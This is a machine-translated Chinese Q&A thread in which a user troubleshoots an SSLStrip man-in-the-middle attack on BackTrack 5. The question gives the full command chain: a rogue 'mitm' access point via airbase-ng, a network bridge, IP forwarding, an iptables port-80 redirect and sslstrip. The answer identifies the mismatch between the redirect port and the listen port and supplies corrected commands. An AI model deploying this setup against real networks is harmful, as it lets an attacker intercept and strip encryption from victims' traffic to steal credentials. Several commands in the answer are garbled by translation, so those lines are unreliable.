SSLStrip不为我工作

Question

在回溯5的MITM设置中，我遇到了SSLStrip的问题。我使用外部无线网卡广播无线信号，并通过以太网进行路由。我正在成功地查看Wireshark中的数据包，但是我想使用SSLStrip查看SSL数据。这些是我用来设置MITM的初步命令。

airmon-ng start wlan1
airbase-ng --essid mitm 11 mon0

-新航站楼--

brctl addbr mitm-bridge
brctl addif mitm-bridge eth0
brctl addif mitm-bridge at0
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
ifconfig mitm-bridge 192.168.0.199 up
echo 1 > /proc/sys/net/ipv4/ip_forward

此时，我可以在WireShark中查看数据包数据。我按照以下步骤设置SSLStrip

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666
cd /pentest/web/sslstrip
sslstrip -l 8080

当我完成会话并打开sslstrip.log时，我不会看到任何数据写入到文件中。此外，我无法访问互联网，一旦我做了iptables重定向。请告诉我你认为问题出在哪里。

Answer 1

假设sslstrip和arp中毒已经启动并运行，那么端口重定向就会出现问题。

iptables -t nat -A PREROUTING -p tcp -目的端口80 -j重定向到端口666

将http通信重定向到127.0.0.1端口666。

cd /pentest/web/web条带

单片-l 8080

启动sslstrip监听端口8080上的传入通信量。

U可以将端口重定向改为8080。

iptables -t nat -A PREROUTING -p tcp -目的端口80 -j重定向到端口8080

或将侦听端口更改为666。

sslstrip -l 666